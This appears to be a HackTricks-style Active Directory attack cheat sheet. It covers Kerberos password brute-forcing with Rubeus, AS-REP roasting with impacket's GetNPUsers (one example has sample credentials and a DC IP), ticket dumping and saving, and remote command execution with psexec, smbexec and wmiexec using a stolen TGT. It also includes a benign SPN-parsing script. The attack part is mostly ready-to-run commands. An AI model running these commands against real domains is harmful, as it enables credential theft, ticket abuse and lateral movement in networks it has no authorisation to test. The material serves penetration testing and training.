```powershell
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```
```bash
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
python3 GetNPUsers.py COMPANY.local/james:Password123 -request -format john -outputfile /home/ubuntu/Documents/file/dir/asrep.out -dc-ip 172.16.1.20

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
```
```powershell
# check ASREPRoast for all users in current domain
.\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
```
An SPN consists of three main parts: the service class (the service type, e.g. SQL, Web, Exchange, File), the host on which the service runs, written as an FQDN (Fully Qualified Domain Name), and the port number.
For example, the Microsoft SQL service runs on the dcorp-mgmt host on port 1443.
The SPN is `MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433`
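To make the three-part structure concrete, the following Python parser is an added example (not HackTricks' code) that splits an SPN into service class, host, optional port and the optional fourth service-name component (used for SQL instance names), and flags hosts that are not written as an FQDN; apart from the MSSQLSvc SPN above, the sample inputs are constructed.

```python
"""Parse Kerberos SPN strings: serviceclass/host[:port][/servicename].

Added example, not HackTricks' own code. The sample inputs below are
constructed, except the first, which is the SPN from the text above.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class SPN:
    service_class: str
    host: str
    port: Optional[int]          # None when the SPN carries no port
    service_name: Optional[str]  # optional fourth component, e.g. a SQL instance name

    def is_fqdn(self) -> bool:
        # A short host name (no dots) is a valid SPN host but is not an FQDN.
        return "." in self.host


def parse_spn(spn: str) -> SPN:
    """Split an SPN into its parts; raise ValueError on a malformed string."""
    parts = spn.split("/")
    if len(parts) < 2 or len(parts) > 3 or not parts[0] or not parts[1]:
        raise ValueError(f"malformed SPN: {spn!r}")
    service_class, host_port = parts[0], parts[1]
    service_name = parts[2] if len(parts) == 3 else None
    # rpartition keeps everything before the last ':' as the host
    host, sep, port_str = host_port.rpartition(":")
    port: Optional[int] = None
    if sep:
        if not port_str.isdigit() or not 0 < int(port_str) < 65536:
            raise ValueError(f"bad port in SPN: {spn!r}")
        port = int(port_str)
    else:
        host = host_port  # no ':' present, so the whole component is the host
    return SPN(service_class, host, port, service_name)


# Constructed sample inputs (the first is the SPN from the text above).
SAMPLE_SPNS = [
    "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433",
    "HTTP/web01.corp.example",                # no port: service default applies
    "MSSQLSvc/sql02.corp.example:1433/PROD",  # instance name as fourth component
    "CIFS/fileserver",                        # short host name, not an FQDN
]

if __name__ == "__main__":
    for s in SAMPLE_SPNS:
        print(parse_spn(s))
```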
📌 HackTricks Tip: If you get this error from Linux: `Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great)`, it is caused by your local time (Kerberos tolerates at most 5 minutes of skew by default), so synchronize the host with the DC: `ntpdate <IP of DC>`
```powershell
.\Rubeus.exe dump

# After dumping tickets with Rubeus (base64-encoded), write one to a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64_ticket>"))
```
```bash
# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file_path>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```